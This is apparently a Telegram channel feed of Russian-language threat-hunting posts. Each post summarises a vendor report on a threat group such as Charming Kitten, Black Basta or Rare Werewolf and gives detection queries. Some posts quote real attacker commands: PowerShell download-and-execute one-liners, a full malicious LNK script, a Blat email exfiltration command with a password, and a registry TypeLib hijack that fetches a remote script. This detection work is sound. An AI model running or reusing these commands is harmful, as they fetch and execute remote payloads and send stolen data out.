Know Your Adversary
09.05.202513:25
Всем привет!
Вот ещё один любопытный случай злоупотребления легитимным программным обеспечением. Согласно отчёту Synactiv, группировка Hunters International использует KickIdler — легитимную программу для мониторинга сотрудников — чтобы шпионить за жертвой, проводить разведку и похищать учётные данные.
Этот инструмент, например, позволяет злоумышленникам выполнять кейлоггинг, захват экрана, запись звука, удалённое управление, а также предоставляет другие интересные функции с точки зрения атакующего.
Во-первых, можно охотиться за файлами с соответствующей подписью:
Далее — запросы DNS, связанные с инструментом:
Можно также отслеживать создание файлов в связанных директориях:
Увидимся завтра!
English version
Вот ещё один любопытный случай злоупотребления легитимным программным обеспечением. Согласно отчёту Synactiv, группировка Hunters International использует KickIdler — легитимную программу для мониторинга сотрудников — чтобы шпионить за жертвой, проводить разведку и похищать учётные данные.
Этот инструмент, например, позволяет злоумышленникам выполнять кейлоггинг, захват экрана, запись звука, удалённое управление, а также предоставляет другие интересные функции с точки зрения атакующего.
Во-первых, можно охотиться за файлами с соответствующей подписью:
event_type: "processcreatewin"
AND
proc_file_sig: "TELE LINK SOFT (TLS) CY LTD"
Далее — запросы DNS, связанные с инструментом:
event_type: "dnsreqwin"
AND
dns_rname: "my.kickidler.com"
Можно также отслеживать создание файлов в связанных директориях:
event_type: "filecreatewin"
AND
file_path: "TeleLinkSoftHelper"
Увидимся завтра!
English version
05.05.202517:00
Всем привет!
Вчера мы говорили о некоторых новых инструментах, разработанных злоумышленником, известным как Venom Spider. Но давайте немного поговорим о классических инструментах, с которыми он также ассоциируется. Я имею в виду бэкдор more_eggs. Он всё ещё используется — например, вот свежая кампания, о которой пишет Arctic Wolf.
Хочу обратить внимание на следующий поведенческий маркер —
Мы можем использовать этот маркер для построения поискового запроса:
А вы замечали использование msxsl.exe в своей инфраструктуре?
Увидимся завтра!
English version
Вчера мы говорили о некоторых новых инструментах, разработанных злоумышленником, известным как Venom Spider. Но давайте немного поговорим о классических инструментах, с которыми он также ассоциируется. Я имею в виду бэкдор more_eggs. Он всё ещё используется — например, вот свежая кампания, о которой пишет Arctic Wolf.
Хочу обратить внимание на следующий поведенческий маркер —
msxsl.exe, легитимный бинарный файл, известный как Microsoft Command Line Transformation Utility, используется для запуска бэкдора:msxsl.exe D30F38D93CA9185.txt D30F38D93CA9185.txtМы можем использовать этот маркер для построения поискового запроса:
event_type: "processcreatewin"
AND
proc_file_name: "msxsl.exe"
AND
cmdline: "txt"
А вы замечали использование msxsl.exe в своей инфраструктуре?
Увидимся завтра!
English version
01.05.202512:40
Всем привет!
Читая отчет Trend Micro об Earth Kasha, я заметил любопытный поведенческий маркер ROAMINGMOUSE: он использует WMI для запуска
Это означает, что мы можем искать подозрительные запуски
Что касается
Увидимся завтра!
English version
Читая отчет Trend Micro об Earth Kasha, я заметил любопытный поведенческий маркер ROAMINGMOUSE: он использует WMI для запуска
JSLNTOOL.EXE через explorer.exe. JSLNTOOL.EXE — это легитимное приложение, которое злоумышленник использует для сайдлоадинга JSFC.dll — вредоносного загрузчика.Это означает, что мы можем искать подозрительные запуски
explorer.exe через wmiprvse.exe с помощью следующего запроса:event_type: "processcreatewin"
AND
proc_file_path: "explorer.exe"
AND
proc_p_file_path: "wmiprvse.exe"
Что касается
JSLNTOOL.EXE, можно также искать связанные события запуска, обращая внимание на нетипичные расположения:event_type: "processcreatewin"
AND
proc_file_originalfilename: "jslntool.exe"
AND NOT
proc_file_path: "justsystems"
Увидимся завтра!
English version
22.04.202515:02
Всем привет!
Мы уже несколько раз говорили о ClickFix. Но интересно наблюдать, как по-разному используется эта техника.
Согласно отчёту Proofpoint, несколько прогосударственных групп начали применять эту технику. Например, TA427 (мы отслеживаем этот кластер активности под именем Monolithic Werewolf). Злоумышленник маскировал вредоносную PowerShell-команду под регистрационный код:
Как видно, команда включает в себя типичные для вредоносных скриптов командлеты PowerShell, такие как
А вы наблюдали другие интересные способы применения ClickFix?
Увидимся завтра!
English version
Мы уже несколько раз говорили о ClickFix. Но интересно наблюдать, как по-разному используется эта техника.
Согласно отчёту Proofpoint, несколько прогосударственных групп начали применять эту технику. Например, TA427 (мы отслеживаем этот кластер активности под именем Monolithic Werewolf). Злоумышленник маскировал вредоносную PowerShell-команду под регистрационный код:
powershell -windowstyle hidden -Command iwr Как видно, команда включает в себя типичные для вредоносных скриптов командлеты PowerShell, такие как
iwr и iex. Разумеется, мы можем использовать это для проактивного поиска (или даже детектирования!):event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: ("iwr" AND "iex")
А вы наблюдали другие интересные способы применения ClickFix?
Увидимся завтра!
English version
18.04.202508:54
Всем привет!
Сегодня мы поговорим о ещё одном интересном сервисе, который злоумышленники используют для связи с серверами управления и контроля (C&C).
Согласно этому отчёту команды Kaspersky, IronHusky использовал легитимный сервер
Что это означает? Мы можем отслеживать обращения к этому домену с помощью следующего запроса:
Злоумышленник использовал упомянутую выше вредоносную программу для загрузки MysterySnail RAT.
Увидимся завтра!
Сегодня мы поговорим о ещё одном интересном сервисе, который злоумышленники используют для связи с серверами управления и контроля (C&C).
Согласно этому отчёту команды Kaspersky, IronHusky использовал легитимный сервер
https://ppng[.]io, основанный на проекте piping-server, для запроса команд и отправки результатов их выполнения.Что это означает? Мы можем отслеживать обращения к этому домену с помощью следующего запроса:
event_type: "dnsreq"
AND
dns_rname: "ppng.io"
Злоумышленник использовал упомянутую выше вредоносную программу для загрузки MysterySnail RAT.
Увидимся завтра!
07.04.202514:44
Всем привет!
Уверен, что техника ClickFix уже всем поднадоела, но позвольте показать ещё один интересный вариант, на который я недавно наткнулся.
Речь снова идёт об использовании PowerShell в злонамеренных целях. На этот раз атакующие применили его для генерации ссылки на загрузку:
Как видно, команда получает количество секунд с начала Unix эпохи (1 января 1970), использует это значение для формирования URL, загружает полезную нагрузку и выполняет её в памяти.
Конечно, такую активность можно легко обнаружить, например, используя следующую логику:
А вы встречали другие интересные скрипты в кампаниях ClickFix?
Увидимся завтра!
English version
Уверен, что техника ClickFix уже всем поднадоела, но позвольте показать ещё один интересный вариант, на который я недавно наткнулся.
Речь снова идёт об использовании PowerShell в злонамеренных целях. На этот раз атакующие применили его для генерации ссылки на загрузку:
powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 168.119.173[.]205:8080/$u|iex"Как видно, команда получает количество секунд с начала Unix эпохи (1 января 1970), использует это значение для формирования URL, загружает полезную нагрузку и выполняет её в памяти.
Конечно, такую активность можно легко обнаружить, например, используя следующую логику:
event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: ("datetime" AND "UtcNow" AND "1970" AND "iex")
А вы встречали другие интересные скрипты в кампаниях ClickFix?
Увидимся завтра!
English version
08.05.202514:04
Всем привет!
В последнее время я редко вижу, чтобы злоумышленники использовали вредоносные документы. Зато файлы LNK (ярлыки) встречаются всё чаще! Сегодня мы рассмотрим ещё один пример, связанный с группировкой Charming Kitten (мы отслеживаем этот кластер активности под названием Cypress Werewolf).
Итак, вредоносный LNK-файл, распространяемый злоумышленниками, содержал следующую команду:
Да, с точки зрения детектирования и охоты это очень интересный пример. Например, используется
Ещё одна интересная возможность для детектирования — это использование
Какие части скрипта показались вам особенно интересными?
Увидимся завтра!
English version
В последнее время я редко вижу, чтобы злоумышленники использовали вредоносные документы. Зато файлы LNK (ярлыки) встречаются всё чаще! Сегодня мы рассмотрим ещё один пример, связанный с группировкой Charming Kitten (мы отслеживаем этот кластер активности под названием Cypress Werewolf).
Итак, вредоносный LNK-файл, распространяемый злоумышленниками, содержал следующую команду:
conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='osf.zip';$pd='Arda.pdf';$pdl='Arda.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr Wow`} ;Да, с точки зрения детектирования и охоты это очень интересный пример. Например, используется
conhost.exe с параметром --headless для запуска скрипта — это хороший кандидат для охоты, хотя потребуется некоторая фильтрация, чтобы исключить легитимную активность:event_type: "processcreatewin"
AND
proc_file_name: "conhost.exe"
AND
cmdline: "headless"
Ещё одна интересная возможность для детектирования — это использование
odbcconf.exe для запуска regsvr32.exe с целью регистрации вредоносной DLL:event_type: "processcreatewin"
AND
proc_file_name: "odbcconf.exe"
AND
cmdline: "regsvr"
Какие части скрипта показались вам особенно интересными?
Увидимся завтра!
English version
04.05.202511:29
Всем привет!
Продолжаю пополнять свою коллекцию PowerShell! Сегодня утром я читал вот этот отчет и заметил ещё один реальный пример злоупотребления PowerShell для подмены временных меток (timestomping).
Злоумышленник создавал запланированные задачи для запуска MeshAgent, а затем выполнял команды PowerShell для изменения временных меток связанных файлов. Вот примеры:
Например, мы можем использовать события ScriptBlock для охоты на злоупотребление командлетом
Удачной охоты!
Увидимся завтра!
English version
Продолжаю пополнять свою коллекцию PowerShell! Сегодня утром я читал вот этот отчет и заметил ещё один реальный пример злоупотребления PowerShell для подмены временных меток (timestomping).
Злоумышленник создавал запланированные задачи для запуска MeshAgent, а затем выполнял команды PowerShell для изменения временных меток связанных файлов. Вот примеры:
(Get-Item “.\vcruntime140_1.dll”).LastAccessTime=(“12 May 2024 11:14:00”) `Например, мы можем использовать события ScriptBlock для охоты на злоупотребление командлетом
Get-Item:event_type: "ScriptExecutionWin"
AND
script_text: "get-item" AND ("lastaccesstime" OR "lastwritetime" OR "creationtime")
Удачной охоты!
Увидимся завтра!
English version
30.04.202515:40
Всем привет!
Мы всё чаще видим использование инструментов для туннелирования. Настолько часто, что такие утилиты, как ngrok и chisel, сегодня зачастую мгновенно обнаруживаются и блокируются (правда ведь?). Что это значит? Злоумышленники всегда ищут альтернативы!
И одной из таких альтернатив является iox — это инструмент с открытым исходным кодом для проброса портов и проксирования внутри сети. Например, его использовала группа, стоящая за вымогателем Ghost.
Этот инструмент часто применяется для проброса портов RDP и SSH, это мы и можем использовать для поиска:
Больше информации об инструменте можно найти здесь.
Увидимся завтра!
Мы всё чаще видим использование инструментов для туннелирования. Настолько часто, что такие утилиты, как ngrok и chisel, сегодня зачастую мгновенно обнаруживаются и блокируются (правда ведь?). Что это значит? Злоумышленники всегда ищут альтернативы!
И одной из таких альтернатив является iox — это инструмент с открытым исходным кодом для проброса портов и проксирования внутри сети. Например, его использовала группа, стоящая за вымогателем Ghost.
Этот инструмент часто применяется для проброса портов RDP и SSH, это мы и можем использовать для поиска:
event_type: "processcreate"
AND
cmdline: "fwd" AND ("22" OR "3389")
Больше информации об инструменте можно найти здесь.
Увидимся завтра!
21.04.202507:02
Всем привет!
Давайте поговорим о не самых распространённых методах закрепления. Согласно отчёту компании ReliaQuest, Black Basta начали использовать новый метод закрепления, основанный на перехвате Component Object Model Type Library.
При перехвате TypeLib злоумышленники изменяют записи в реестре, чтобы перенаправить легитимные COM-объекты на вредоносные скрипты или файлы.
Злоумышленники выполнили следующую команду:
Например, мы можем искать злоупотребление reg.exe с помощью запроса:
Также можно отслеживать события изменения реестра:
Увидимся завтра!
English version
Давайте поговорим о не самых распространённых методах закрепления. Согласно отчёту компании ReliaQuest, Black Basta начали использовать новый метод закрепления, основанный на перехвате Component Object Model Type Library.
При перехвате TypeLib злоумышленники изменяют записи в реестре, чтобы перенаправить легитимные COM-объекты на вредоносные скрипты или файлы.
Злоумышленники выполнили следующую команду:
reg add "HKEY_CURRENT_USER\Software\Classes\TypeLib{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64" /t REG_SZ /d "script:hxxps://drive.google[dot]com/uc?export=download^&id=1l5cMkpY9HIERae03tqqvEzCVASQKen63" /fНапример, мы можем искать злоупотребление reg.exe с помощью запроса:
event_type: "processcreatewin"
AND
proc_file_name: "reg.exe"
AND
cmdline: ("TypeLib" И "script")
Также можно отслеживать события изменения реестра:
event_type: "registryvaluesetwin"
AND
reg_key_path: "TypeLib"
AND
reg_value_data: "script"
Увидимся завтра!
English version
10.04.202515:02
Всем привет!
Sapphire Werewolf обновил Amethyst Stealer и теперь использует Canarytokens для сбора информации о скомпрометированных системах.
Хотя Canarytokens обычно применяются для обнаружения вредоносной активности, злоумышленники могут использовать их, чтобы получать уведомления о новых жертвах!
Злоумышленник использовал следующую ссылку для сбора информации о заражённой системе — включая её IP-адрес и информацию о том, является ли она виртуальной машиной:
Разумеется, мы можем охотиться за подозрительными DNS-запросами:
Больше информации о тактиках, техниках и процедурах Sapphire Werewolf можно найти в соответствующем отчёте.
Увидимся завтра!
English version
Sapphire Werewolf обновил Amethyst Stealer и теперь использует Canarytokens для сбора информации о скомпрометированных системах.
Хотя Canarytokens обычно применяются для обнаружения вредоносной активности, злоумышленники могут использовать их, чтобы получать уведомления о новых жертвах!
Злоумышленник использовал следующую ссылку для сбора информации о заражённой системе — включая её IP-адрес и информацию о том, является ли она виртуальной машиной:
hxxp://canarytokens[.]com/traffic/tags/static/xjemqlqirwqru9pkrh3j4ztmf/payments.js
Разумеется, мы можем охотиться за подозрительными DNS-запросами:
event_type: "dnsreq"
AND
dns_rname: "canarytokens.com"
Больше информации о тактиках, техниках и процедурах Sapphire Werewolf можно найти в соответствующем отчёте.
Увидимся завтра!
English version
07.04.202512:41
Всем привет! Если хотите больше узнать о применении киберразведданных - это статья для вас! А если захотите задать вопросы - присоединяйтесь к завтрашнему вебинару!
Не змогли отримати доступ
до медіаконтенту
до медіаконтенту
07.05.202515:38
Всем привет!
Продолжаем рассматривать RMM-инструменты, которые наблюдаются в арсенале группировок, распространяющих вымогательское ПО. На этот раз мы посмотрим на Supremo. Это легитимное средство удалённого доступа, которое было замечено в использовании аффилированными с Black Basta злоумышленниками.
Обычно злоумышленники не модифицируют исполняемый файл, поэтому он выглядит абсолютно легитимным. Это значит, что мы снова и снова можем сосредоточиться на метаданных. Вот пример запроса:
То же самое касается событий создания файлов в папках, связанных с инструментом:
Какие ещё интересные RMM-инструменты, используемые операторами вымогателей, вам доводилось видеть?
Увидимся завтра!
English version
Продолжаем рассматривать RMM-инструменты, которые наблюдаются в арсенале группировок, распространяющих вымогательское ПО. На этот раз мы посмотрим на Supremo. Это легитимное средство удалённого доступа, которое было замечено в использовании аффилированными с Black Basta злоумышленниками.
Обычно злоумышленники не модифицируют исполняемый файл, поэтому он выглядит абсолютно легитимным. Это значит, что мы снова и снова можем сосредоточиться на метаданных. Вот пример запроса:
event_type: "processcreatewin"
AND
proc_file_productname: "Supremo Remote Control"
То же самое касается событий создания файлов в папках, связанных с инструментом:
event_type: "filecreate"
AND
file_path: "SupremoRemoteDesktop"
Какие ещё интересные RMM-инструменты, используемые операторами вымогателей, вам доводилось видеть?
Увидимся завтра!
English version
03.05.202512:39
Всем привет!
Insikt Group раскрыла два новых семейства вредоносных программ: TerraStealerV2 и TerraLogger. Оба были приписаны злоумышленнику, известному как Golden Chickens. Этот злоумышленник предоставляет инструменты другим преступникам, работая по модели Malware-as-a-Service (MaaS).
Я ознакомился с отчетом и (как всегда) нашел несколько возможностей для обнаружения.
Например, злоумышленник использовал
Мы можем искать подобную активность с помощью следующего запроса:
Еще один пример, злоумышленник использует
Мы можем использовать следующий запрос для поиска выполнения OCX-файлов из папок
Еще пример: стилер использует
Обязательно ознакомьтесь с отчетом — в нем полно идей для разработки детектирующей логики!
Увидимся завтра!
English version
Insikt Group раскрыла два новых семейства вредоносных программ: TerraStealerV2 и TerraLogger. Оба были приписаны злоумышленнику, известному как Golden Chickens. Этот злоумышленник предоставляет инструменты другим преступникам, работая по модели Malware-as-a-Service (MaaS).
Я ознакомился с отчетом и (как всегда) нашел несколько возможностей для обнаружения.
Например, злоумышленник использовал
ssh.exe для проксирования выполнения PowerShell:ssh.exe -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')"Мы можем искать подобную активность с помощью следующего запроса:
event_type: "processcreatewin"
AND
proc_file_name: "ssh.exe"
AND
cmdline: "proxycommand"
Еще один пример, злоумышленник использует
regsvr32.exe для выполнения вредоносного OCX-файла:regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocxМы можем использовать следующий запрос для поиска выполнения OCX-файлов из папок
Temp:event_type: "processcreatewin"
AND
proc_file_name: "regsvr32.exe"
AND
cmdline: "temp" AND "ocx"
Еще пример: стилер использует
ifconfig[.]me для сбора информации о IP-адресе скомпрометированной системы, мы также можем использовать это для проактивного поиска:event_type: "dnsreq"
AND
dns_rname: "ifconfig.me"
Обязательно ознакомьтесь с отчетом — в нем полно идей для разработки детектирующей логики!
Увидимся завтра!
English version
28.04.202518:36
Всем привет!
Пора снова поговорить о средствах уклонения от защиты, замеченных в атаках программ-вымогателей! На этот раз мы рассмотрим инструментарий группировки Qilin.
Инструмент, на который мы обратим внимание, называется YDArk. Это мощный инструмент для манипуляций с ядром системы, который появился на китайских теневых форумах ещё в 2020 году. Разумеется, злоумышленники используют его для завершения процессов, связанных с антивирусами и решениями EDR.
Как обычно, мы можем использовать оригинальное имя файла для обнаружения:
Также можно сфокусироваться на драйвере, который он использует:
Кроме того, он создаёт службу — это ещё одна возможность для обнаружения!
Увидимся завтра!
English version
Пора снова поговорить о средствах уклонения от защиты, замеченных в атаках программ-вымогателей! На этот раз мы рассмотрим инструментарий группировки Qilin.
Инструмент, на который мы обратим внимание, называется YDArk. Это мощный инструмент для манипуляций с ядром системы, который появился на китайских теневых форумах ещё в 2020 году. Разумеется, злоумышленники используют его для завершения процессов, связанных с антивирусами и решениями EDR.
Как обычно, мы можем использовать оригинальное имя файла для обнаружения:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "YDArk.exe"
Также можно сфокусироваться на драйвере, который он использует:
event_type: "driverloadwin"
AND
file_name: "YDArkDrv.sys"
Кроме того, он создаёт службу — это ещё одна возможность для обнаружения!
Увидимся завтра!
English version
20.04.202519:15
Всем привет!
Уверен, что все уже слышали о CVE-2025-24054, уязвимости, связанной с раскрытием хеша NTLM через спуфинг.
Check Point опубликовала отчёт с обзором того, как эта уязвимость используется в реальных атаках. Эксплуатация уязвимости происходит с минимальным взаимодействием со стороны пользователя — например, при выборе, просмотре или выполнении любого действия с файлом, кроме его открытия или запуска.
Злоумышленники используют вредоносные файлы с расширением
Увидимся завтра!
English version
Уверен, что все уже слышали о CVE-2025-24054, уязвимости, связанной с раскрытием хеша NTLM через спуфинг.
Check Point опубликовала отчёт с обзором того, как эта уязвимость используется в реальных атаках. Эксплуатация уязвимости происходит с минимальным взаимодействием со стороны пользователя — например, при выборе, просмотре или выполнении любого действия с файлом, кроме его открытия или запуска.
Злоумышленники используют вредоносные файлы с расширением
.library-ms, которые распространяются через фишинговые письма. Файлы с таким расширением встречаются довольно редко, поэтому мы можем отследить их появление по событиям создания файлов:event_type: "filecreate"
AND
file_path: "library-ms"
Увидимся завтра!
English version
09.04.202518:49
Всем привет!
Думаю, вы уже слышали об уязвимости нулевого дня в Common Log File System (CLFS), которая эксплуатировалась RansomEXX. Речь идет о CVE-2025-29824.
Если заглянуть в отчет Microsoft Threat Intelligence Center (MSTIC), можно заметить любопытный артефакт. В рамках эксплуатации создается CLFS BLF-файл:
Что это значит? Мы можем использовать это поведение для проактивного поиска подобной активности! Например:
Несмотря на то, что злоумышленник использовал уязвимость нулевого дня для повышения привилегий, в цепочке атаки были и легко обнаруживаемые действия — например, злоупотребление ProcDump для дампа LSASS.
Как всегда — даже в сложных случаях у нас есть масса возможностей для детектирования!
Увидимся завтра!
English version
Думаю, вы уже слышали об уязвимости нулевого дня в Common Log File System (CLFS), которая эксплуатировалась RansomEXX. Речь идет о CVE-2025-29824.
Если заглянуть в отчет Microsoft Threat Intelligence Center (MSTIC), можно заметить любопытный артефакт. В рамках эксплуатации создается CLFS BLF-файл:
C:\ProgramData\SkyPDF\PDUDrv.blf.Что это значит? Мы можем использовать это поведение для проактивного поиска подобной активности! Например:
event_type: "filecreatewin"
AND
file_path: ("programdata" AND "blf")
Несмотря на то, что злоумышленник использовал уязвимость нулевого дня для повышения привилегий, в цепочке атаки были и легко обнаруживаемые действия — например, злоупотребление ProcDump для дампа LSASS.
Как всегда — даже в сложных случаях у нас есть масса возможностей для детектирования!
Увидимся завтра!
English version
Переслав з:
BI.ZONE
07.04.202512:41
🌛 Как угрозоцентричный подход позволяет избежать ущерба от кибератак
В новой статье рассказали о подходе к кибербезопасности, который позволит сосредоточиться на самых актуальных угрозах.
Из нее вы узнаете:
🟦что это за подход,
🟦в чем его преимущества,
🟦как предотвращать реальные атаки, используя киберразведданные.
Читать статью
А чтобы закрепить материал, подключайтесь к бесплатному вебинару. На нем обсудим, как получить максимум от данных киберразведки и какие инструменты BI.ZONE Threat Intelligence помогут в проактивном поиске угроз для вашей организации.
➡️Зарегистрироваться
В новой статье рассказали о подходе к кибербезопасности, который позволит сосредоточиться на самых актуальных угрозах.
Из нее вы узнаете:
🟦что это за подход,
🟦в чем его преимущества,
🟦как предотвращать реальные атаки, используя киберразведданные.
Читать статью
А чтобы закрепить материал, подключайтесь к бесплатному вебинару. На нем обсудим, как получить максимум от данных киберразведки и какие инструменты BI.ZONE Threat Intelligence помогут в проактивном поиске угроз для вашей организации.
➡️Зарегистрироваться
06.05.202514:32
Всем привет!
Очередной день — очередной способ обхода EDR. В недавнем отчёте команда реагирования на инциденты Stroz Friedberg компании Aon выявила технику Bring Your Own Installer, которую злоумышленник использовал для обхода и отключения SentinelOne EDR.
Злоумышленник воспользовался легитимным установщиком SentinelOne EDR для запуска процесса обновления агента, но прервал его, завершив процесс
Если такая возможность ещё есть, можно попытаться отследить подозрительные события завершения процесса
Увидимся завтра!
English version
Очередной день — очередной способ обхода EDR. В недавнем отчёте команда реагирования на инциденты Stroz Friedberg компании Aon выявила технику Bring Your Own Installer, которую злоумышленник использовал для обхода и отключения SentinelOne EDR.
Злоумышленник воспользовался легитимным установщиком SentinelOne EDR для запуска процесса обновления агента, но прервал его, завершив процесс
msiexec.exe, связанный с обновлением версии SentinelOne.Если такая возможность ещё есть, можно попытаться отследить подозрительные события завершения процесса
msiexec.exe, например, с помощью taskkill:event_type: "processcreatewin"
AND
proc_file_name: "taskkill"
AND
cmdline: "msiexec"
Увидимся завтра!
English version
02.05.202508:14
Всем привет!
Мы уже несколько раз говорили о том, как злоумышленники используют PowerPoint для доставки вредоносного ПО. Пора обсудить это снова!
Seqrite опубликовала отчет о деятельности APT36 (мы отслеживаем этот кластер под названием Translucent Werewolf). Согласно исследованию, злоумышленники использовали файлы надстроек PowerPoint (PPAM) для доставки Crimson RAT.
По моим наблюдениям, такие файлы довольно редки в современных инфраструктурах, поэтому мы можем искать события открытия PPAM-файлов:
Увидимся завтра!
English version
Мы уже несколько раз говорили о том, как злоумышленники используют PowerPoint для доставки вредоносного ПО. Пора обсудить это снова!
Seqrite опубликовала отчет о деятельности APT36 (мы отслеживаем этот кластер под названием Translucent Werewolf). Согласно исследованию, злоумышленники использовали файлы надстроек PowerPoint (PPAM) для доставки Crimson RAT.
По моим наблюдениям, такие файлы довольно редки в современных инфраструктурах, поэтому мы можем искать события открытия PPAM-файлов:
event_type: "processcreatewin"
AND
proc_file_name: "powerpnt.exe"
AND
cmdline: "ppam"
Увидимся завтра!
English version
23.04.202515:46
Всем привет!
Злоумышленники продолжают использовать легитимные исполняемые файлы для DLL Side-Loading. На этот раз они злоупотребили программами от Trend Micro и Bitdefender.
Согласно отчёту компании Symantec, шпионская группа Billbug использовала исполняемый файл от Trend Micro с именем
Мы можем охотиться за подозрительной активностью этих исполняемых файлов, ориентируясь на подозрительные имена и расположения:
Увидимся завтра!
Злоумышленники продолжают использовать легитимные исполняемые файлы для DLL Side-Loading. На этот раз они злоупотребили программами от Trend Micro и Bitdefender.
Согласно отчёту компании Symantec, шпионская группа Billbug использовала исполняемый файл от Trend Micro с именем
tmdbglog.exe для сайдлоадинга вредоносной библиотеки tmdglog.dll, а также файл bds.exe от Bitdefender для сайдлоадинга DLL с именем log.dll.Мы можем охотиться за подозрительной активностью этих исполняемых файлов, ориентируясь на подозрительные имена и расположения:
event_type: "processcreatewin"
AND
proc_file_originalfilename: ("PtWatchDog.exe" OR "BDSubWiz.exe")
Увидимся завтра!
19.04.202515:17
Всем привет!
Давайте рассмотрим ещё один инструмент, который используют вымогатели для отключения решений AV/EDR. Я говорю о ZammOcide.
Это ещё один пример эксплуатации уязвимого драйвера, на этот раз драйвера Zemana Anti-Malware (zam64.sys). Разумеется, мы можем использовать это для обнаружения:
Инструмент также создает сервис с именем "
Конечно, этот инструмент используется в реальных атаках! Например, группой вымогателей CrazyHunter.
Увидимся завтра!
English version
Давайте рассмотрим ещё один инструмент, который используют вымогатели для отключения решений AV/EDR. Я говорю о ZammOcide.
Это ещё один пример эксплуатации уязвимого драйвера, на этот раз драйвера Zemana Anti-Malware (zam64.sys). Разумеется, мы можем использовать это для обнаружения:
event_type: "driverloadwin"
AND
file_name: "zam64.sys"
Инструмент также создает сервис с именем "
ZammOcide". Это мы тоже можем использовать для обнаружения:event_type: "serviceinstallwin"
AND
service_name: "ZammOcide"
Конечно, этот инструмент используется в реальных атаках! Например, группой вымогателей CrazyHunter.
Увидимся завтра!
English version
08.04.202515:22
Всем привет!
Сегодня я решил поделиться информацией об одном интересном инструменте для эксфильтрации данных, который используется группировкой Rare Werewolf. Он называется Blat.
Этот инструмент используется этой группировкой уже довольно давно. Вот пример:
Как видите, злоумышленник использует этот инструмент для эксфильтрации собранных данных мессенджера Telegram. То есть да, Blat — это просто небольшая легитимная утилита, которая позволяет злоумышленникам отправлять собранные данные по электронной почте!
Мы можем отслеживать такую активность, сосредоточив внимание на учетных данных и вложениях:
Кстати, у этого образца есть и другие интересные поведенческие особенности — взгляните!
Увидимся завтра!
Сегодня я решил поделиться информацией об одном интересном инструменте для эксфильтрации данных, который используется группировкой Rare Werewolf. Он называется Blat.
Этот инструмент используется этой группировкой уже довольно давно. Вот пример:
blat.exe -to in@vniir.nl -f "TELEGRAM<sent1@vniir.nl>" -server mail.vniir.nl -port 587 -u sent1@vniir.nl -pw fuFhDK3anVteQCvfVQWk -subject "Telegram 927537/user" -body "Telegram 927537/user" -attach "C:\Users\user\Window\tdata.rar"Как видите, злоумышленник использует этот инструмент для эксфильтрации собранных данных мессенджера Telegram. То есть да, Blat — это просто небольшая легитимная утилита, которая позволяет злоумышленникам отправлять собранные данные по электронной почте!
Мы можем отслеживать такую активность, сосредоточив внимание на учетных данных и вложениях:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "blat.exe"
AND
cmdline: ("u" AND "pw" AND "attach")
Кстати, у этого образца есть и другие интересные поведенческие особенности — взгляните!
Увидимся завтра!
06.04.202508:51
Всем привет!
Давайте снова поговорим о Mustang Panda (мы отслеживаем этот кластер под именем Horned Werewolf, если помните).
Этот противник обожает использовать DLL Side-Loading и постоянно находит новые уязвимые исполняемые файлы. Например, в этот раз кластер использовал Canon IJ Printer Assistant Tool.
Можно ли мы отследить такую активность? Конечно!
Начнём с запуска Canon IJ Printer Assistant Tool (cnmpaui.exe) из нетипичных директорий:
Ещё один показательный признак — запуск winword.exe из cnmpaui.exe для показа отвлекающего документа:
Как всегда, вы можете найти ещё больше возможностей для обнаружения, если захотите!
Удачной охоты и увидимся завтра!
English version
Давайте снова поговорим о Mustang Panda (мы отслеживаем этот кластер под именем Horned Werewolf, если помните).
Этот противник обожает использовать DLL Side-Loading и постоянно находит новые уязвимые исполняемые файлы. Например, в этот раз кластер использовал Canon IJ Printer Assistant Tool.
Можно ли мы отследить такую активность? Конечно!
Начнём с запуска Canon IJ Printer Assistant Tool (cnmpaui.exe) из нетипичных директорий:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "cnmpaui.exe"
AND NOT
proc_file_path: "Canon\\Canon IJ Printer Assistant Tool"
Ещё один показательный признак — запуск winword.exe из cnmpaui.exe для показа отвлекающего документа:
event_type: "processcreatewin"
AND
proc_p_file_path: "cnmpaui.exe"
AND
proc_file_path: "winword.exe"
Как всегда, вы можете найти ещё больше возможностей для обнаружения, если захотите!
Удачной охоты и увидимся завтра!
English version
Показано 1 - 24 із 42
Увійдіть, щоб розблокувати більше функціональності.